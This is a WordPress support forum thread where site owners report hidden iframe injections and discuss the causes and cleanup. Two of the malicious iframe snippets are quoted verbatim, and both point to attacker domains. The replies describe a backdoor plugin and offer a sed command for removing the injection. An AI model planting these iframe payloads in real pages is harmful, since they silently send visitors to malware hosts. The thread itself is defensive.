Support » Fixing WordPress » iFrame Hack on Several WP Sites

  • Hello –

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specfic hack code is:
    <iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    • Gauge how often it’s happening
    • Share solutions
    • Expose the culprits, if possible
    • Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advise, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for virus’ on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do same.

    Here are the other useful threads I have found:

    – Scott

Viewing 15 replies - 16 through 30 (of 38 total)
  • whooami

    (@whooami)

    Member

    folks…

    please understand that NOT all “iframe hacks” are created equal. Some are potentially wordpress specific but a good deal are not.

    Additionally, it’s a widespread issue, bluehost sites, godaddy sites, hostgator.. you name it, theyve seen iframe exploits.

    Here’s a few things to consider when trying to determine potential causes:

    Do you have other stuff in your web space besides wordpress? Do files in there have the same iframes? Are multiple files affected? Like ALL files that have the word “index” in them? Or “default”? Or “home”?

    People that write wordpress specific hacks know that the wp-content/index.php doesnt typically get displayed in a browser, or that index.html in that one plugin’s directory. So those files are not typically changed if its wordpress specific.

    On the other hand, gumblar-type attacks,

    http://news.cnet.com/8301-1009_3-10244529-83.html

    write the iframe code to all the index.* files and all the home.* files, regardless of the file’s location.

    If you have THAT sort of problem, you MUST scan any and all local machines that access the site using an ftp client, for malware. MUST MUST MUST. That means your machine at work, etc..

    You MUST change your ftp password.

    And for those of you using Internet cafes or kiosks — bad idea.

    You MUST make sure your local machines are current on their software – and that any security patches have been applied.

    yadda yadda ..

    Ive written this so many times my fingers are raw.

    http://www.village-idiot.org/archives/2009/06/05/a-rant-about-malware-and-stuff/

    Thanks for such a detailed explanation whooami

    I have two ftp acccounts one for wp and other for vbulletin.I found that both the scripts have been attacked by same iframe.Now I have started to scan my pc for virus,malwares etc.Also I cant change password from cpanel so I have requested my webhost to allow me to change passwords from now onwards.I will report in here as i proceed.

    If you are having trouble removing the scripts from your pages and/or getting your site back into Google’s good graces, you might want to check out http://www.iframehack.com . Their blog provides quite a bit of information on the hack, including a list of the domains that these hidden iframes are directing traffic to, and provide a service that removes the malicious content from all of the pages on your site that were affected by the virus/trojan and assists with getting the site reincluded in Google results and having the “attack site” label removed.

    Hope this helps someone!

    what the heck.. no advertisement please.

    Help out the community not help yourself

    hello. i am being stuck with the same virus. it places an iframe code connecting to some site called mega-statistic (dot) org

    I use a barely one month old Mac running Leopard (if this helps solve the problem)
    FTP using CyberDuck

    my coders use older Windows based PCs ((if this helps solve the problem))

    my coders ALSO use Ubuntu.

    the code was only found on the index.php of my theme (ndesign studio’s itheme)

    the code is this:

    <iframe src="http://mega-statistic.org/1/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

    interesting this is, my server host asked me to place two files called http://ftp.allow and http://ftp.deny to restrict ftp access to certain defined IP addresses only. still this problem happened.

    do you think there is an invisible malware code installer now residing on the server (my root directory et al) itself? what do you guys think?

    also, I am not a programmer, just a cinematographer, but was wondering if its possible to run a small command which will automatically check and clean all the files on my server? especially since I HAVE identified the line of abusive code?

    almost like a phpBB admin utility?

    would that be a fast way to check the files?

    If you happen to have ssh access, you can remove it using that.
    You’d want to make a backup of your files first just in case something gets messed up, then the command would be something like this:

    find ./public_html/ -type f -exec sed -i ‘s/<iframe.*mega-statistic.org*iframe>//g’ {} \;

    Not all WordPress themes work with every version of WordPress. Yours may have become outdated and should be removed or upgraded.
    Every plugin is different and some of the old ones may cause problems, so make sure you choose recent plugins and only install ones which you need.

    Read the following for tips to assist with cleaning up hackers code and keeping your site more secure:

    http://wordpress.org/support/topic/281767?replies=19
    http://codex.wordpress.org/Hardening_WordPress
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://guvnr.com/web/blogging/10-tips-to-make-wordpress-hack-proof/

    thanks. am trying to upgrade my wp and the theme as well!

    Thanks to bh_WP_fan, I do not use wordpress but was looking for a good solution to this problem.

    Got hit by similar iframe attack today.

    Damage:
    1. Got iframe inserts in root index.php (possibly more, quickly overwrote with clean WP install)

    2. Got hidden and very obscured PHP backdoor in WP plugins dir, “blog” sub-dir. Check for this people! I would’ve missed it if I wasn’t very thorough and checking everything few times – it didn’t show in installed plugins.

    What can I say about method:
    1. There was no FTP involved, FTP log is absolutely clean as far as it goes.
    2. I don’t believe my home PC was compromised (confident me).
    3. I had found actual intrusion in access log. How it went (as far as I can tell):
    – hacker came from online service that looks for sites on same server (now I am worried about server having hole)
    – blog home page loaded
    – wp-login seems typed by hand and suddenly he is in admin
    – manually uploads and activates backdoor plugin
    – briefly checks plugin few hours later from another ip

    Log fragment for those who want to take a look:
    http://dl.getdropbox.com/u/58900/ip.csv

    Weirdest part – it seems hacker just saw my blog for the first time, no previous visits, no poking around, no bruteforce attempts I can see. He just came by looking for site on specific server and somehow just logged in.

    My conclusion – this was purely WP attack, hacker made beeline for WP login and he knew exactly what was he doing with that plugin.

    Question is – where the heck is hole, in WP or in server. 🙁

    Update.

    Today I caught login attempt from hacker in exactly same way, IP block prevented him from going into admin.

    Half an hour later my database disappeared. 🙁

    alndavis

    (@alndavis)

    Rarst,

    Is your server on hostgator by any chance?

    @alndavis

    Nope, but there was similar hack in same time frame at hostgator. Came up in comments about situation at my blog.

    As for my situation support confirmed that hacker had earlier overtaken another site on server (via exploit on outdated WP version) and from there he went cracking whatever else on server he saw.

    xinfo

    (@xinfo)

    even i faced this problem , well it not wordpress or web hosting company problem , it’s user system problem

    user system have malware

    1,you have clean it with malwarebytes

    2, and change the password

    keep in mind other theme which is not active in the site also attacked so you have clean all the theme which is also not active .

    jiekma

    (@jiekma)

    Health, wealth, love of wisdom
    http://jiekma.3homehk.com/

Viewing 15 replies - 16 through 30 (of 38 total)
  • The topic ‘iFrame Hack on Several WP Sites’ is closed to new replies.